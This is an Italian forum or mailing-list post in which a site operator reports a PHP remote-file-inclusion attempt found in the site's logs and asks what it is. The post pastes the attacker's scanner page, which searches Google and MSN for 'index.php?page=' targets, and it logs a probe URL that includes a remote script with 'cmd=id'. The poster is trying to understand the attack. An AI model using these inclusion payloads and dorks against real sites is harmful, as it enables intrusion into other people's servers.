dai log del sito geekplace.org ho letto uno strano log
si tratta di un php injection.
una cosa del tipo:
index.php?modulo=http//sito.com/script.php
seguendo quel link si trova quanto segue
se qualcuno ha voglia e sa fare una ricerca per capire di cosa si tratta
sarebbe interessante capire cosa succede in rete
da quel che ho notato è una sorta di motore di ricerca su
busca.uol.com.br ma non sono sicuro, forse sto prendendo un abbaglio io...
grazie, ciao
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<meta name="Generator" content="AoD">
<title>Scanning...</title>
</head><body
onload="window.location='scan.php?id=35&sites=213.140.17.107-124622112306.txt';">Checking...
[34] -
http://www.darkreading.com/document.asp?doc_id=110363&f_src=http://busca.uol.com.br/uol/index.html?&cmd=id
- [Bug <b>OFF</b>]</body>
</html>
<body
onload="window.location='scan.php?id=0&sites=213.140.17.107-125047112306.txt';">
Aguarde... este processo pode levar alguns minutos.<br>
http://www.jaskiela.de/html/images/logos/.x/scan.php?id=39&sites=213.140.17.107-125047112306.txt
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Language" content="pt-br">
<title>Scan v1.5.2</title><script type="text/javascript">
function go() {
var q = document.busca.q.value;
if (q == '') {
alert("Coloque todos os campos");
return false;
} else
{
if (document.mec.R1[0].checked)
{
window.location='google.php?q='+q;
} else if (document.mec.R1[1].checked)
{
window.location='msn.php?q='+q;
}
return false;
}
}
function show() {
if (document.mec.R1[0].checked)
{
document.getElementById('exemplos').innerHTML =
'allinurl:index.php?page=';
} else if (document.mec.R1[1].checked)
{
document.getElementById('exemplos').innerHTML =
'index.php?page=';
}
}
</script></head>
<body style="font-family: 'Lucida Console';" onload="show()">
<div align="center">
<center>
<table border="0" cellspacing="1" height="74" width="400">
<tbody><tr>
<td height="19" width="400">
<form method="post" action="#" style="margin: 0pt;"
onsubmit="return go();" name="busca">
<p style="margin: 2px; font-size: 12px;">Busca: <input
name="q" size="31" style="border: 1px solid rgb(0, 0, 0); font-family:
'Lucida Console'; font-size: 12px;" type="text"> <input value="Start"
name="B1" style="border: 1px solid rgb(0, 0, 0); font-family: 'Lucida
Console'; font-size: 12px;" type="submit"></p>
</form>
</td>
</tr>
<tr>
<td style="border-top: 1px solid rgb(0, 0, 0); border-bottom: 1px
solid rgb(0, 0, 0); font-size: 12px;" height="18" width="400"><p
style="margin: 2px;">Mecanismos > <a id="exemplos" style="color:
rgb(255, 0, 0);"></a></p></td>
</tr>
<tr>
<td height="19" width="400">
<form method="post" action="#" style="margin: 0pt;" name="mec">
<p style="margin: 2px; font-size: 12px;"><input value="V1"
checked="checked" name="R1" onclick="show();" type="radio">Google</p>
<p style="margin: 2px; font-size: 12px;"><input name="R1"
value="V2" onclick="show();" type="radio">Search MSN</p>
</form>
</td>
</tr>
</tbody></table>
</center>
</div>
</body></html>
--
Attualmente mi aggiro per
http://GeekPlace.org
E Preferisco ricevere posta crittografata.
ID: 0x855C6C8C sul server: pgp.mit.edu
"Il fatto che un'opinione sia ampiamente condivisa, non è affatto una prova che non sia completamente assurda. Anzi, considerata la stupidità della maggioranza degli uomini, è più probabile che un'opinione diffusa sia cretina anziché sensata."
Bertrand Russell
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS/CM/IT a-- C++ L U+++ L++ W+++ PS+++ PE- PGP++ !tv G
------END GEEK CODE BLOCK------
